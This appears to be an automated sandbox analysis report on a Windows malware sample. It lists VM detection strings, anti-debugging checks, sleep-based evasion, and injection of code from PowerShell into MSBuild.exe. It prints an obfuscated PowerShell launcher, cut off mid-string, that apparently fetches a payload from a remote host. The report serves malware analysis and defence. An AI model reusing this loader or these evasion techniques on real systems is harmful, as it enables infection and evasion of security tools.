                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7536Thread sleep count: 6823 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7536Thread sleep count: 2998 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99781s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99671s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99562s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99453s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99343s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99234s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99124s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99013s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98902s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98796s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98687s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98578s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98468s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98357s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98243s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98140s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98031s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -97921s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -97812s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -97702s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -97593s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -97477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -97374s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -97265s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -97156s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -97045s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -96937s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -96823s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99876s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99751s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99626s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99501s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99376s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99251s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99126s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -99001s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98876s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98751s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98626s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98501s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98376s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98251s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98126s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -98001s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -97876s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -97751s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7728Thread sleep time: -97626s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99890Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99671Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99453Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99234Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99124Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99013Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98902Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98796Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98687Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98578Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98468Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98357Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98243Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98031Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97921Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97812Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97702Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97593Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97374Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97265Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97156Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97045Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96937Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96823Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99876Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99751Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99626Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99501Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99376Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99251Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99126Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99001Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98876Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98751Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98626Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98501Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98376Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98251Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98126Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98001Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97876Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97751Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97626Jump to behavior
                        Source: MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !vmware virtual s scsi disk device
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware svga
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxservice
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: name!vmware virtual s scsi disk device
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware pointing device
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwarexDc
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware sata
                        Source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VirtualMachineDetector
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmsrvc
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V
                        Source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinst
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwarexDc
                        Source: powershell.exe, 00000007.00000002.1457560353.000001AE7CAF0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware vmci bus device
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware sata{0} ({1})
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareU{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I = {8} }}
                        Source: MSBuild.exe, 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware usb pointing device
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware s
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmusrvc
                        Source: MSBuild.exe, 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtools
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01BAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: virtualmachinedetector
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_02D770B0 CheckRemoteDebuggerPresent,10_2_02D770B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Yara matchFile source: amsi64_8188.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_8188.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTR
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FD7008Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksIwB4slanshacksCMslanshacksLgslanshackszslanshacksDIslanshacksMgslanshacksvslanshacksHYslanshacksZQBkslanshacksC4slanshacksMgByslanshacksC4slanshacksMgslanshacks5slanshacksGQslanshacksMwslanshacks5slanshacksDMslanshacksZQBjslanshacksGYslanshacksMslanshacksslanshacksyslanshacksDUslanshacksOslanshacksslanshacks2slanshacksGQslanshacksYQBislanshacksGYslanshacksMslanshacksslanshacks0slanshacksGYslanshacksMslanshacksBlslanshacksGEslanshacksMslanshacksBkslanshacksDslanshacksslanshacksYgBmslanshacksDcslanshacksZgslanshacks2slanshacksC0slanshacksYgB1slanshacksHslanshacksslanshacksLwslanshacksvslanshacksDoslanshackscwBwslanshacksCMslanshacksIwBoslanshacksCcslanshacksOwslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksbQBvslanshacksHQslanshacksbwByslanshacksGIslanshacksaQBrslanshacksGUslanshacksZslanshacksslanshacksgslanshacksC0slanshackscgBlslanshacksHslanshacksslanshacksbslanshacksBhslanshacksGMslanshacksZQslanshacksgslanshacksCcslanshacksIwslanshacksnslanshacksCwslanshacksIslanshacksslanshacksnslanshacksHQslanshacksJwslanshacks7slanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksaslanshacksB0slanshacksHQslanshackscslanshacksBzslanshacksDoslanshacksLwslanshacksvslanshacksGkslanshacksYQslanshacks2slanshacksDslanshacksslanshacksMslanshacksslanshacksyslanshacksDslanshacksslanshacksNslanshacksslanshacksuslanshacksHUslanshackscwslanshacksuslanshacksGEslanshackscgBjslanshacksGgslanshacksaQB2slanshacksGUslanshacksLgBvslanshacksHIslanshacksZwslanshacksvslanshacksDIslanshacksNQslanshacksvslanshacksGkslanshacksdslanshacksBlslanshacksG0slanshackscwslanshacksvslanshacksG4slanshacksZQB3slanshacksF8slanshacksaQBtslanshacksGEslanshacksZwBlslanshacksF8slanshacksMgslanshackswslanshacksDIslanshacksNQslanshackswslanshacksDMslanshacksMQslanshacks4slanshacksC8slanshacksbgBlslanshacksHcslanshacksXwBpslanshacksG0slanshacksYQBnslanshacksGUslanshacksLgBqslanshacksHslanshacksslanshacksZwslanshacksnslanshacksDsslanshacksJslanshacksBwslanshacksGEslanshackscgB0slanshacksGkslanshacksYwBpslanshacksHslanshacksslanshacksYQBuslanshacksGMslanshackseQslanshacksgslanshacksD0slanshacksIslanshacksBOslanshacksGUslanshacksdwslanshackstslanshacksE8slanshacksYgBqslanshacksGUslanshacksYwB0slanshacksCslanshacksslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBOslanshacksGUslanshacksdslanshacksslanshacksuslanshacksFcslanshacksZQBislanshacksEMslanshacksbslanshacksBpslanshacksGUslanshacksbgB0slanshacksDsslanshacksJslanshacksBzslanshJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command ""$codigo = 'jslanshacksbtslanshacksg8slanshacksdslanshacksbvslanshackshislanshacksygbpslanshacksgsslanshackszqbkslanshackscslanshacksslanshackspqslanshacksgslanshacksccslanshacksiwb4slanshackscmslanshackslgslanshackszslanshacksdislanshacksmgslanshacksvslanshackshyslanshackszqbkslanshacksc4slanshacksmgbyslanshacksc4slanshacksmgslanshacks5slanshacksgqslanshacksmwslanshacks5slanshacksdmslanshackszqbjslanshacksgyslanshacksmslanshacksslanshacksyslanshacksduslanshacksoslanshacksslanshacks2slanshacksgqslanshacksyqbislanshacksgyslanshacksmslanshacksslanshacks0slanshacksgyslanshacksmslanshacksblslanshacksgeslanshacksmslanshacksbkslanshacksdslanshacksslanshacksygbmslanshacksdcslanshackszgslanshacks2slanshacksc0slanshacksygb1slanshackshslanshacksslanshackslwslanshacksvslanshacksdoslanshackscwbwslanshackscmslanshacksiwboslanshacksccslanshacksowslanshackskslanshackshmslanshacksaslanshacksbhslanshacksg0slanshacksyqb0slanshacksguslanshacksdqbyslanshacksgkslanshackscwbtslanshackscslanshacksslanshackspqslanshacksgslanshackscqslanshacksbqbvslanshackshqslanshacksbwbyslanshacksgislanshacksaqbrslanshacksguslanshackszslanshacksslanshacksgslanshacksc0slanshackscgblslanshackshslanshacksslanshacksbslanshacksbhslanshacksgmslanshackszqslanshacksgslanshacksccslanshacksiwslanshacksnslanshackscwslanshacksislanshacksslanshacksnslanshackshqslanshacksjwslanshacks7slanshackscqslanshacksaslanshacksblslanshacksg4slanshacksywboslanshacksgkslanshacksbgbnslanshackscslanshacksslanshackspqslanshacksgslanshacksccslanshacksaslanshacksb0slanshackshqslanshackscslanshacksbzslanshacksdoslanshackslwslanshacksvslanshacksgkslanshacksyqslanshacks2slanshacksdslanshacksslanshacksmslanshacksslanshacksyslanshacksdslanshacksslanshacksnslanshacksslanshacksuslanshackshuslanshackscwslanshacksuslanshacksgeslanshackscgbjslanshacksggslanshacksaqb2slanshacksguslanshackslgbvslanshackshislanshackszwslanshacksvslanshacksdislanshacksnqslanshacksvslanshacksgkslanshacksdslanshacksblslanshacksg0slanshackscwslanshacksvslanshacksg4slanshackszqb3slanshacksf8slanshacksaqb